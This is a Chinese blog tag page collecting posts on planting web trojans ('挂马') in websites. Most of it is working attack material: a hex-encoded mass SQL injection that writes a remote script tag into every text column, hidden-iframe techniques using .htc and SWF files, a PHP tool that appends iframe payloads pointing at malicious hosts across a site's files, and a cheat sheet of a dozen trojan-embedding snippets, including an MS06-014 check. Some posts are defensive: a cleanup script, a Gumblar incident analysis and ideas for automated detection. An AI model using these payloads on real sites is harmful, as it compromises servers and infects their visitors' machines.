我的时光,停在了你的角落…~
Posts tagged 挂马
数据库清理批量挂马
Apr 10th
文/饭
数据库批量挂马,已经成为挂马的一种主要方式,网上也有许多不同的挂马代码被站长们公布,大多形不同而意同,还有变异的直接突破waf的,再现了挂与反挂之间的激烈较量。ZZZzzz…. 情绪稳定的分析注入语句如下:
dEcLaRe @s vArChAr(8000) sEt @s= 0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e223e3c736372697074207372633d687474703a2f2f2536312532452537302537302536442536442536462536462532452536332536453e3c2f7363726970743e3c212d2d27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f52 eXeC(@s)--
利用了动态执行,对上次这段代码进行十六进制转换整理如下:
dEcLaRe @t vArChAr(255),@c vArChAr(255) –定义变量 dEcLaRe tAbLe_cursoR cUrSoR –游标 FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) –遍历表和字段 oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) –开始 bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(vArChAr,['+@c+']))+''</title>"><script src=http:// a.ppmmoo.cn ></script><!--''') –执行更新 fEtCh next FrOm tAbLe_cursoR iNtO @t,@c –游标指向下一记录 eNd –结束 cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR
存在于syscolumns表里面的name是列名,xtype是数据类型,其与数字的对应关系是: xtype=99 'ntext' xtype=35 'text' xtype=231 'nvarchar' xtype=167 'varchar' 此语句执行的是意思是,遍历用户创建的表,搜索列类型为ntext,text, nvarchar,varchar的列,之后与定义的游标进行关联,再利用游标进行update操作。 写入内容“<script src="http://a.ppmmoo.cn"><!--mce:0--></script>”,完全成数据库批量挂马。
如图:
直接写个语句去掉所插入的语句
use tempdb;
declare @t varchar(555),@c varchar(555) ,@inScript varchar(8000)
set @inScript='<script src=http:// a.ppmmoo.cn ></script>'
declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
open table_cursor
fetch next from table_cursor into @t,@c
while(@@fetch_status=0)
begin
exec('update ['+@t+'] set ['+@c+']=replace(cast(['+@c+'] as varchar(8000)),'''+@inScript+''','''')' )
fetch next from table_cursor into @t,@c
end
close table_cursor
deallocate table_cursor;
清理完后,可以对数据库对象sysobjects、syscolumns的select权限去掉,防止这样的重复劳动SSSsss...
永久链接 : http://www.nuanyue.com/%e6%b8%85%e7%90%86%e6%95%b0%e6%8d%ae%e5%ba%93%e6%89%b9%e9%87%8f%e6%8
挂马的两个新方法(11期黑客手册稿子)
Nov 12th
作者:lcx
这里只做技术讨论,不做具体危害的事。如果你要用我的方法去做,我也没办法,呵呵。关于挂马,基本上是在网页原来的代码里加载一个iframe。关于加载iframe,我以前的文章写过几种,这篇文章里再提两个新方法吧。
一、利用htc文件来加载iframe。
百度百科里对htc文件的解释为:从5.5版本开始,Internet Explorer(IE)开始支持Web 行为的概念。这些行为是由后缀名为.htc的脚本文件描述的,它们定义了一套方法和属性,程序员几乎可以把这些方法和属性应用到HTML页面上的任何元素 上去。Web 行为是非常伟大的因为它们允许程序员把自定义的功能“连接”到现有的元素和控件,而不是必须让用户下载二进制文件(例如ActiveX 控件)来完成这个功能。Web 行为还是推荐的扩展IE对象模型和控件集的方法。微软在它的开发者站点上的DHTML 行为库栏目里提供了几个定制的Web行为。
这些专业的术语看看就头疼,我们看实际应用。先来看一下vbs写的hello.htc
★
<attach event=”ondocumentready” ONEVENT=”Hello()” />
<script language=”VBScript”>
Function Hello()
MsgBox “Hello, World!”
End Function
</script>
★
我们再来写一个1.htm来调用,代码:
★
<html>
<body style=”behavior: url(hello.htc)”>
</body>
</html>
★
我们把hello.htc和1.htm放在同一个目录下,用ie执行1.htm就会成功弹出一个hello world对话框。如果用vbs来执行的话,中马的人只有ie用户了,用火狐的就漏掉了,我们改成js的,直接用1.htm加载新的hello.htc, 新的代码为:
★
<attach event=”ondocumentready” ONEVENT=”hello()” />
<script>
function hello()
{
var O = document.createElement(“iframe”);
O.width = ’0′;
O.height = ’0′;
O.src=”http://www.sohu.com“;
ownerDocument.body.appendChild(O); //注意看,这里用的是ownerDocument,这是精华。
}
</script>
★
这样你把hello.htc传到对方网站目录下,然后在对方页面里加上<body style=”behavior: url(hellow1.htc)”>就可以成功加载框加了,呵呵。
二、关于swf加载网马的简便做法
用swf直接加载iframe也不是什么新方法了,不过我这里有一个简单做法,用到的软件就是flasm。我已经做好了一个模板,是swf.swf。我们在dos下运行flasm -d swf.swf>swf.flm,如图1所示。
图1
其中flasm -d swf.swf>swf.flm是生成swf.flm,如果不加>swf.flm是直接显示源码了。你只需要改变图1当中的url地址和框架 高度就可以了。改变地址后,我们再运行一个命令:flasm -a swf.flm就生成你需要的swf了,如图2所示。
图2
我们再写一个swf.htm调用,代码为:
★
<head>
</head>
<body>
<embed src=swf.swf witdh=0 height=0></embed>
</body>
★
注意的是<embed src=swf.swf witdh=0 height=0></embed> 一定要加在body中间,要不然你不会成功,这是和我写的as代码有关。如果大家有什么疑问,可以去我的blog:http://hi.baidu.com/myvbscript。
[文章中的文件1.htm、hello.htc以及swf.htm、swf.htc、flasm.rar已收录在本期光盘]
注:这里我做的flash样本没有提供,也没有什么了,大家主要看看htc的方法吧
批量挂马和批量清马程序
Aug 2nd
<?php
function gmfun($path=”.”)
{
$d = @dir($path);
while(false !== ($v = $d->read())) {
if($v == “.” || $v == “..”) continue;
$file = $d->path.”/”.$v;
if(@is_dir($file)) {
gmfun($file);
} else {
if(@ereg(stripslashes($_POST["key"]),$file)) {
$mm=stripcslashes( trim( $_POST[mm] ) );
$handle = @fopen (”$file”, “a”);
@fwrite($handle, “$mm”);
@fclose($handle);
echo “已挂马文件:$file\n<br>”;}
}
}
$d->close();
echo ” “;
}
function qmfun($path=”.”)
{
$d = @dir($path);
while(false !== ($v = $d->read())) {
if($v == “.” || $v == “..”) continue;
$file = $d->path.”/”.$v;
if(@is_dir($file)) {
qmfun($file);
} else {
if(@ereg(stripslashes($_POST["key"]),$file)) {
$mm=stripcslashes( trim( $_POST[mm] ) );
$handle = fopen (”$file”, “rb”);
$oldcontent=fread($handle,filesize($file));
fclose($handle);
$newcontent=str_replace($mm,””,$oldcontent);
$fw = fopen (”$file”, “wb”);
fwrite($fw,$newcontent,strlen($newcontent));
fclose($fw);
echo “已清马文件:$file\n<br>”;}
}
}
$d->close();
echo ” “;
}if ($_GET['action']==’gm’) {
set_time_limit(0);
gmfun($_POST["dir"]);
}
if ($_GET['action']==’qm’) {
set_time_limit(0);
qmfun($_POST["dir"]);
}
?>
<title>批量挂马(清马)程序php版</title><body>
<form action=”<?$PHP_SELF?>?action=gm” method=”post”>
<table border=”0″ align=”center” cellpadding=”0″ cellspacing=”0″>
<tr>
<td height=”25″ colspan=”2″ bgcolor=”006699″> <div align=”center”><font color=”#00FF00″ size=”4″>网站批量挂马程序php版
BY n3tl04d</font></div>
<td> </tr>
<tr>
<td height=”27″ bgcolor=”#CCCCCC”>路径:</td>
<td height=”27″ bgcolor=”#CCCCCC”> <input name=”dir” type=”text” value=”.”>(可填相对路径)
<td> </tr>
<tr>
<td height=”27″ bgcolor=”#CCCCCC”>挂马关键字:</td>
<td height=”27″ bgcolor=”#CCCCCC”> <input name=”key” type=”text” value=’index\.|default\.|main\.|\.html’>—–正则表达式匹配——
<td colspan=”2″ height=”1″></td>
<td> </tr>
<tr>
<td height=”25″ bgcolor=”#CCCCCC”>想写入的挂马代码:</td>
<td height=”25″ bgcolor=”#CCCCCC”><input name=”mm” type=”text” size=”50″ value=’<iframe src=http://982.9966.org/b073399/b07.htm width=0 height=0 frameborder=0></iframe>’>
<td> </tr>
<tr>
<td height=”25″ colspan=”2″ bgcolor=”006699″> <div align=”center”>
<input type=”submit” name=”Submit” value=”提交”>
<input type=”reset” name=”Submit2″ value=”重置”>
</div></td>
<td> </tr>
</table>
</form>
<form action=”<?$PHP_SELF?>?action=qm” method=”post”>
<table border=”0″ align=”center” cellpadding=”0″ cellspacing=”0″>
<tr>
<td height=”25″ colspan=”2″ bgcolor=”006699″> <div align=”center”><font color=”#00FF00″ size=”4″>批量清马工具php版
BY 随风而去(LST)</font></div>
<td> </tr>
<tr>
<td height=”27″ bgcolor=”#CCCCCC”>路径:</td>
<td height=”27″ bgcolor=”#CCCCCC”> <input name=”dir” type=”text” value=”.”>(可填相对路径)
<td> </tr>
<tr>
<td height=”27″ bgcolor=”#CCCCCC”>清马关键字:</td>
<td height=”27″ bgcolor=”#CCCCCC”> <input name=”key” type=”text” value=’index\.|default\.|main\.|\.html’>—–正则表达式匹配——
<td colspan=”2″ height=”1″></td>
<td> </tr>
<tr>
<td height=”25″ bgcolor=”#CCCCCC”>想清除的挂马代码:</td>
<td height=”25″ bgcolor=”#CCCCCC”><input name=”mm” type=”text” size=”50″ value=’<iframe src=http://%31%73%61%6e%69%32%6b%6d%2e%63%6e/%6A%6A%32.htm width=50 height=0 frameborder=0></iframe>’>
<td> </tr>
<tr>
<td height=”25″ colspan=”2″ bgcolor=”006699″> <div align=”center”>
<input type=”submit” name=”Submit” value=”提交”>
<input type=”reset” name=”Submit2″ value=”重置”>
</div></td>
<td> </tr>
</table>
</form>
<p align=”center”>本程序是在n3tl04d的批量挂马的基础上修改而成,在此表示感谢<br>
大家在实战中最好不要用批量挂马,能找共用的文件挂马就最好用共用的方法挂吧<br>
做人要厚道<br>
by 随风而去 07.12.06
谈谈 PHP, WordPress 与挂马
Jul 9th
惡意的PDF檔案一點都不是新聞,過去 doc、flash 以及圖片等都已經被大量利用在 PC 的感染中,但前一陣子在日本以
及各地頻傳的事件 (1,2) 顯示,才發現一種綜合型的攻擊組合已經出現,也引起我對於了解後面原因的興趣。
我從 client, server 兩個方面來說明:
1. client
這次利用的攻擊瀏覽器方式稱為 JSRedir-R,它其實是一種攻擊方式的通稱,在友廠的分類說明中 可以見到它是利用 PDF,
Flash/SWF 的漏洞來讓瀏覽器, PDF reader 或 flash player 直接做為下載器 (downloader), 將後續的其他 binary 安裝到
執行這個 JSRedir-R 的電腦上,隨後就開始進行自動側錄,這次側錄的通訊協定鎖定 Web hosting 使用者常用的 ftp,
為何這麼做呢? 1. 明碼 2. 登入帳號密碼經常1~2個封包就可錄到。
網路上這篇討論描述了這個狀況,節錄如下:
“One of our clients computers was infected with the client-side portion of the virus. It’s a trojan that monitors
all FTP traffic, sending the auth details back to the payload server (gumblar.cn)..”
2. server: 這次駭客在想甚麼?
約3個月前,就開始有人在WordPress (咱們就簡稱為WP) 論壇上面歇斯底里的求救, “Seriously, I need your help! ” ,
很明顯的,他遇到了無論登入 wp-admin 後改密碼或是檔案移除,那一段攻擊程式碼都還是會再被自動加回去所有的
index-files,想必夜不成眠吧。
去年,我們監控到 Mass SQL Injection 的大範圍 SQL 注入,分析了原因是攻擊方利用 Google 的強大搜尋找攻擊對象,
但這次不一樣,不需要這麼麻煩,這次駭客不辛苦的打 Mass SQL Injection 了,直接從 web 管理員的電腦直接掛馬側錄、
傳回 Bot 監控主機、連到目標 ftp server, 接著自動竄改每一個 PHP 網頁,都可以自動化/半自動了, 然後去逛這些
WP, Drupal 網頁的人,都執行了 pdf 與 swf,若沒做自我保護,會繼續受到 JSRedir-R 的感染,然後被側錄,..
就這樣一直循環下去, oh my goodness!!
慶幸的是,到目前為止,這並還未演變成 server 對 server 的病毒感染事件,否則可以想像機房內的網路、Web主機眾多的
virtual host sites 會變成甚麼狀況,不過這跟 Web Hosting 的架構設計有關,這邊就有另外一種狀況。
既 然被補上去 WP 與 Drupal 的源碼是 PHP,我開始將注意力轉向 WordPress 的源碼去,開放源碼的壞處就是容易成為
下一個目標,事實上我的同事 Wisely 在兩年前就已經用我們內部的工具檢測過 WP 的兩個主要版本了,兩年多下來,
我印象中看到針對 WP 本身新弱點的次數並不多,但 WP 畢竟做為全球著名的部落格發行軟體,為了服務廣大的使用者
採用了開放式的架構,並有許多對應的外掛被開發出來,然而這些眾多的外掛卻成了另一大隱憂的來 源,光在
milw0rm.com 上就至少有數十個 exploit 被公布,我從中取了一個做驗證,ID為 9048的這個攻擊是利用 DM-albums這個外掛:
這個弱點是 Remote File Dislosure Vulnerability,在 OWASP 的定義為 Resource Injection ,我們立即將 config.php 原始擋下載回來:
用 IDE 開來看,wow, 真的是 config.php,可以拿來分析設定與系統架構:
接著我用 CodeSecure 掃了兩次,分別是將 register_global 這個設定關閉:
以及開啟:
都找到跟 dm-albums.php 這個進入點有關的 Resource Injection,其中一條弱點問題追蹤列出如下,很明顯的,至少就有
currdir 這個變數沒有被處理好:
看到弱點這樣多,我真的開始覺得任意瀏覽網站的風險太高了。
以前打 client 端是拿個資、打 server 端是拿主機與 DB,做完就各自結束,但從 5月份的 Gumblar 開始,透過在 WP, Drupal
等 Blog 平台插入 PHP 程式碼的新掛馬手法讓感染來源成指數成長,如果你發現你的部落格的程式碼內出現奇怪的新程式碼,
建議趕快用一台乾淨的機器上網改掉密碼並回復所有的 PHP 網頁,然後將受感染的電腦做進一步檢查,詳細做法可參考這篇,
若剛好你的部落格也用了不少外掛,建議先搜尋一下有沒有已經被公布的弱點 (關鍵字: “exploit” “vulnerability),然後儘早因應,
至少被公開的弱點一定得想辦法剔除。
作者: Walter Tsai 為阿碼科技CTO
特殊的TXT挂马
Jun 19th
转自Qglfnt’s Blog http://www.esunk.cn
我们平常挂马无外乎就那么几种方式,如框架挂马、js挂马、css挂马.
txt不是文本文件吗?它如何挂马?且听我慢慢道来,很简单的说.
如果有人给你发个一个类似http://www.xxx.com/test.txt的链接,你敢不敢打开?如果你觉得这只是一个txt文件,打开就打开,没有什么好怕的,那是因为你还没听说过txt文件挂马,如果你听说过,那么你就不会这么大胆了.
我们把以下代码保存为test.txt
PS:为了显示,所以把width,height的值才设的那么大的.真正挂马的话最好设成0
然后把test.txt上传到web空间中,访问一下,在框架中打开了百度这死Y.
这可能要算浏览器的一个小BUG,在txt文件中只要加上SCRIPT,浏览器就会把它认为是HTML文件,就会解析执行.
国内第一个利用XSS WORM挂马的案例
Apr 30th
国内第一个利用XSS WORM挂马的案例,这个BUG通过组合UBB标签实现XSS,和以前DZ的未公布的一个QQ UBB XSS是同一类型问题,请小心使用Qzone,等待官方修复。
Qzone UBB XSS WORM,全部样本已经截获,这个是国内第一个利用XSS WORM挂马的案例。
详细可以查看:
http://forum.eviloctal.com/viewthread.php?tid=35024
PS.蠕虫仍然在传播,有少部分被挂马的受害者,挂马已经被撤下。
QQ于4月27日凌晨左右修补改漏洞,现蠕虫已经停止传播。
关于网页木马自动化分析的两个小思路
Mar 22nd
Author: rayh4c [80sec]
现在网上的网页木马多是几套固定的代码,变化并不多,包括脚本代码的加密方式,几乎也都是解释型的加密,由于黑客都是进行的流程化挂马,老外对于自动化分析网页木马也已经有了丰厚的成果。国内我所见过的自动化网马分析系统有知道创宇、360安全卫士和安恒等,其他包括国内的各大杀毒安全公司,应该也都有一套自己的网马分析系统。
自动化分析网页木马需要一个好的页面分析系统,分离页面中的各种静态元素资源和脚本内容,同时需要一个模拟的脚本解释引擎和沙盒环境等。我这里仅说下我的两个小思路:
1.纯静态分析
只需要取到页面的静态内容,仅仅需要使用正则匹配分离出HTML内容和脚本内容,直接分析HTML内容,剩下的将分离出来的脚本内容丢给脚本解释引擎执行,当然这里有些小瓶颈,但我们可以改造脚本解释引擎,对某些网马所使用的关键函数进行处理,不难分离OBJECT和SHELLCODE之类的关键内容。javascript的解释引擎我们可以选择蜘蛛猴,当然这个东西有个致命的缺点,如果黑客使用VBSCRIPT或者封装代码进入FLASH等没有静态代码内容的文件执行脚本的话,很难再进行自动分析。
2.沙盒分析
鉴于第一种方式的种种缺点,我们仍然可以使用沙盒方式分析,直接把网马丢到真实的浏览器中跑,但之前我们需要使用第一个老思路先使用解决到几个关键的脚本函数,类似下脚本断点吧,输出关键内容或针对脚本的行为进行分析。IE的话我们可以使用COM HOOK,而FF甚至不需要大力气我们可以直接使用Greaseamonkey插件等。
以上仅仅是隐晦的说了两个小思路,没有涉及实际内容。我也是在慢慢摸索,“黑客”的挂马方式肯定是会越来越高级,我更倾向于沙盒分析。
from:http://hi.baidu.com/80sec/blog/item/f82ad3422323e71b72f05d54.html
[整理]常用的挂马方式和系统判断等代码
Oct 10th
一:框架挂马
<iframe src=地址 width=0 height=0></iframe>
二:js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>
三:js变形加密
<SCRIPT language="JScript.Encode" src=http://www.upx.com.cn/muma.txt></script>
muma.txt可改成任意后缀
四:body挂马
<body onload="window.location='地址';"></body>
五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.upx.com.cn/muma.htm/"></iframe>';
六:css中挂马
body {
background-image: url('javascript:document.write("<script src=http://www.upx.com.cn/muma.js></script>")')}
七:JAJA挂马
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
八:图片伪装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
九:伪装调用:
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
十:高级欺骗
<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
十一:判断系统代码
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>404</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
<BODY>
<SCRIPT language=javascript>
window.status="";
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
window.location.href="tk.htm";
else
window.location.href="upx06014.htm";
</SCRIPT>
</BODY></HTML>
十二:判断是否有ms06014代码
<script language=VBScript>
on error resume next
set server = document.createElement("object")
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File = server.createobject(Adodb.Stream,"")
if Not Err.Number = 0 then
err.clear
document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
else
document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
end if
</script>
十三:智能读取js的代码demo
//读娶src的对象
var v = document.getElementById("advjs");
//读娶src的参数
var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));
document.write("<iframe src=\"http://www.upx.com.cn/1/"+u_num+".htm\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>");
document.writeln("<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\">");
document.writeln("<HTML><HEAD>");
document.writeln("<META http-equiv=Content-Type content=\"text\/html; charset=big5\">");
document.writeln("<META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR><\/HEAD>");
document.writeln("<BODY> ");
document.writeln("<DIV style=\"CURSOR: url(\'http:\/\/www.upx.com.cn\/demo.js\')\">");
document.writeln("<DIV ");
document.writeln("style=\"CURSOR: url(\'http:\/\/www.upx.com.cn\/demo.js\')\"><\/DIV><\/DIV><\/BODY><\/HTML>")
//分析src的参数函数
function getUrlParameterAdv(asName,lsURL){
loU = lsURL.split("?");
if (loU.length>1){
var loallPm = loU[1].split("&");
for (var i=0; i<loallPm.length; i++){
var loPm = loallPm[i].split("=");
if (loPm[0]==asName){
if (loPm.length>1){
return loPm[1];
}else{
return "";
}
}
}
}
return null;
}
最新评论